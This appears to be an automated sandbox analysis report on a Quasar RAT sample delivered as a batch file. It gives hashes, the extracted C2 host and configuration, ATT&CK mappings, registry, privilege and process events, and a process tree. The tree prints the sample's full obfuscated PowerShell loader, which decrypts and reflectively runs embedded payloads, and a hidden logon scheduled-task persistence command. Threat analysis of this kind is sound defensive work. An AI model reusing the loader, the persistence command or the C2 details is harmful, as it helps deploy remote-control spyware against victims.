quasar | 238be5cbe7d3d26bd815468a35061520c984e73ef6eeefe202ad5a173372f136

Analysis

max time kernel
110s
max time network
111s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2024 15:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.bat
Size

1.9MB
MD5

f8783f60ab5e5665f88d15125937097a
SHA1

d401c0545a1596c34e0a0f5d7f4a8e90c0444b07
SHA256

238be5cbe7d3d26bd815468a35061520c984e73ef6eeefe202ad5a173372f136
SHA512

7173b42b72b2b4bfed091945c1843dfe5acdcc701db37e6432eaabd96ef74252ee21ed01ea67e56ebc12e70248b5eaf176108886a2199ad01fc4928fd51a76b3
SSDEEP

24576:CkBOAnFF88UI+78BqCNpzIihx/5b7Oy/HUagEc/Hhns1UUM92VzwvVS74y0zGQoJ:CGeJlCnxlANNKzwSX4yJjh

Score

10^/10

quasar new execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

New

even-lemon.gl.at.ply.gg:33587

Mutex

2bce5514-d527-4787-825c-3042f9dd5ede

Attributes

encryption_key
501DB7A849356BF2C272A70D53FAF39F17D4245C
install_name
WinHost32.exe
log_directory
UpdateLogs
reconnect_delay
3000
startup_key
Powershell
subdirectory
System32

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 2 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4164-218-0x000002515A640000-0x000002515A95E000-memory.dmp	family_quasar
behavioral1/memory/4164-280-0x000002515B7B0000-0x000002515B80E000-memory.dmp	family_quasar

Blocklisted process makes network request 4 IoCs

Processes:

powershell.exe

flow pid process

2 4164 powershell.exe
4 4164 powershell.exe
6 4164 powershell.exe
11 4164 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1324 powershell.exe
1596 powershell.exe
4164 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	pid	process
2	4164	powershell.exe
4	4164	powershell.exe
6	4164	powershell.exe
11	4164	powershell.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache\1a\52C64B7E	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

pid	process
1324	powershell.exe
1324	powershell.exe
1324	powershell.exe
1596	powershell.exe
1596	powershell.exe
1596	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe
4164	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

powershell.exe

pid process

4164 powershell.exe

pid	process
4164	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1324	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1596	powershell.exe
Token: SeSecurityPrivilege	1596	powershell.exe
Token: SeTakeOwnershipPrivilege	1596	powershell.exe
Token: SeLoadDriverPrivilege	1596	powershell.exe
Token: SeSystemProfilePrivilege	1596	powershell.exe
Token: SeSystemtimePrivilege	1596	powershell.exe
Token: SeProfSingleProcessPrivilege	1596	powershell.exe
Token: SeIncBasePriorityPrivilege	1596	powershell.exe
Token: SeCreatePagefilePrivilege	1596	powershell.exe
Token: SeBackupPrivilege	1596	powershell.exe
Token: SeRestorePrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeSystemEnvironmentPrivilege	1596	powershell.exe
Token: SeRemoteShutdownPrivilege	1596	powershell.exe
Token: SeUndockPrivilege	1596	powershell.exe
Token: SeManageVolumePrivilege	1596	powershell.exe
Token: 33	1596	powershell.exe
Token: 34	1596	powershell.exe
Token: 35	1596	powershell.exe
Token: 36	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1596	powershell.exe
Token: SeSecurityPrivilege	1596	powershell.exe
Token: SeTakeOwnershipPrivilege	1596	powershell.exe
Token: SeLoadDriverPrivilege	1596	powershell.exe
Token: SeSystemProfilePrivilege	1596	powershell.exe
Token: SeSystemtimePrivilege	1596	powershell.exe
Token: SeProfSingleProcessPrivilege	1596	powershell.exe
Token: SeIncBasePriorityPrivilege	1596	powershell.exe
Token: SeCreatePagefilePrivilege	1596	powershell.exe
Token: SeBackupPrivilege	1596	powershell.exe
Token: SeRestorePrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeSystemEnvironmentPrivilege	1596	powershell.exe
Token: SeRemoteShutdownPrivilege	1596	powershell.exe
Token: SeUndockPrivilege	1596	powershell.exe
Token: SeManageVolumePrivilege	1596	powershell.exe
Token: 33	1596	powershell.exe
Token: 34	1596	powershell.exe
Token: 35	1596	powershell.exe
Token: 36	1596	powershell.exe
Token: SeIncreaseQuotaPrivilege	1596	powershell.exe
Token: SeSecurityPrivilege	1596	powershell.exe
Token: SeTakeOwnershipPrivilege	1596	powershell.exe
Token: SeLoadDriverPrivilege	1596	powershell.exe
Token: SeSystemProfilePrivilege	1596	powershell.exe
Token: SeSystemtimePrivilege	1596	powershell.exe
Token: SeProfSingleProcessPrivilege	1596	powershell.exe
Token: SeIncBasePriorityPrivilege	1596	powershell.exe
Token: SeCreatePagefilePrivilege	1596	powershell.exe
Token: SeBackupPrivilege	1596	powershell.exe
Token: SeRestorePrivilege	1596	powershell.exe
Token: SeShutdownPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeSystemEnvironmentPrivilege	1596	powershell.exe
Token: SeRemoteShutdownPrivilege	1596	powershell.exe
Token: SeUndockPrivilege	1596	powershell.exe
Token: SeManageVolumePrivilege	1596	powershell.exe
Token: 33	1596	powershell.exe
Token: 34	1596	powershell.exe
Token: 35	1596	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

4164 powershell.exe

pid	process
4164	powershell.exe

Suspicious use of WriteProcessMemory 58 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4360 wrote to memory of 196	4360	cmd.exe	cmd.exe
PID 4360 wrote to memory of 196	4360	cmd.exe	cmd.exe
PID 4360 wrote to memory of 1324	4360	cmd.exe	powershell.exe
PID 4360 wrote to memory of 1324	4360	cmd.exe	powershell.exe
PID 1324 wrote to memory of 1596	1324	powershell.exe	powershell.exe
PID 1324 wrote to memory of 1596	1324	powershell.exe	powershell.exe
PID 1324 wrote to memory of 2256	1324	powershell.exe	WScript.exe
PID 1324 wrote to memory of 2256	1324	powershell.exe	WScript.exe
PID 2256 wrote to memory of 3684	2256	WScript.exe	cmd.exe
PID 2256 wrote to memory of 3684	2256	WScript.exe	cmd.exe
PID 3684 wrote to memory of 4672	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 4672	3684	cmd.exe	cmd.exe
PID 3684 wrote to memory of 4164	3684	cmd.exe	powershell.exe
PID 3684 wrote to memory of 4164	3684	cmd.exe	powershell.exe
PID 4164 wrote to memory of 3120	4164	powershell.exe	Explorer.EXE
PID 4164 wrote to memory of 2756	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1964	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 4128	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1368	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1956	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1756	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1164	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2932	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1552	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1352	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 4752	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 4848	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 356	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1528	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1420	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 724	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2292	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2488	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1304	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1500	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 908	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2680	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2672	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2080	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 3056	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 884	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 4632	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 868	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1064	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1648	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1056	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1096	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1636	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1832	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2616	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1816	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1016	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1212	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 1996	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2980	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 812	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 2968	4164	powershell.exe	svchost.exe
PID 4164 wrote to memory of 592	4164	powershell.exe	svchost.exe

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:724

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:812

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:868

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:908

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1016

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
PID:356

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:884

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1056

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1064

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1096

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1212

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1304

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1352

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1368

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1420

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1500

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1528

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1552

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1636

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1648

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1756

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1832

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1956

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1964

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:1996

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2292

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2488

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2616

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2672

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2680

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Modifies data under HKEY_USERS
PID:2756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2932

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2968

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2980

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3056

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4360

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RraM6c1wVE69LOhS63yS6OJMD6518X6H50zBpgr4S1Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Dw/jfH0zbe/dB8gdPkFobA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vaBxR=New-Object System.IO.MemoryStream(,$param_var); $TXzAp=New-Object System.IO.MemoryStream; $WECIm=New-Object System.IO.Compression.GZipStream($vaBxR, [IO.Compression.CompressionMode]::Decompress); $WECIm.CopyTo($TXzAp); $WECIm.Dispose(); $vaBxR.Dispose(); $TXzAp.Dispose(); $TXzAp.ToArray();}function execute_function($param_var,$param2_var){ $pczyB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BZSpk=$pczyB.EntryPoint; $BZSpk.Invoke($null, $param2_var);}$dxuGk = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $dxuGk;$JlLXA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dxuGk).Split([Environment]::NewLine);foreach ($vKLRe in $JlLXA) { if ($vKLRe.StartsWith('uTEOEkOVItxiSdtllPIt')) { $Xqbpb=$vKLRe.Substring(20); break; }}$payloads_var=[string[]]$Xqbpb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:196

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_893_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1596

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:2256

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3684

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('RraM6c1wVE69LOhS63yS6OJMD6518X6H50zBpgr4S1Q='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Dw/jfH0zbe/dB8gdPkFobA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vaBxR=New-Object System.IO.MemoryStream(,$param_var); $TXzAp=New-Object System.IO.MemoryStream; $WECIm=New-Object System.IO.Compression.GZipStream($vaBxR, [IO.Compression.CompressionMode]::Decompress); $WECIm.CopyTo($TXzAp); $WECIm.Dispose(); $vaBxR.Dispose(); $TXzAp.Dispose(); $TXzAp.ToArray();}function execute_function($param_var,$param2_var){ $pczyB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $BZSpk=$pczyB.EntryPoint; $BZSpk.Invoke($null, $param2_var);}$dxuGk = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_893.bat';$host.UI.RawUI.WindowTitle = $dxuGk;$JlLXA=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($dxuGk).Split([Environment]::NewLine);foreach ($vKLRe in $JlLXA) { if ($vKLRe.StartsWith('uTEOEkOVItxiSdtllPIt')) { $Xqbpb=$vKLRe.Substring(20); break; }}$payloads_var=[string[]]$Xqbpb.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:4672

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV
1⤵
PID:4632

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
PID:4128

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:4752

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
8592ba100a78835a6b94d5949e13dfc1

SHA1
63e901200ab9a57c7dd4c078d7f75dcd3b357020

SHA256
fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c

SHA512
87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
f1a325839c7db1406f67df8a3161b3e3

SHA1
19c222851a8ea948dc5ad73923b39cb2c1a77ce3

SHA256
6037a2dfc8107efdb9523f10ec18182eca24d72c125b76755094ef622bc68334

SHA512
fc9bf0a50123dbfbfb8acdf99345c7c98136fe0309ba5ad4be13c686f4dc96c2f7e68b552d0487cc5bf8a42355f126c04e399491a12008f97097899313a35043

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y3wur5xm.joo.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
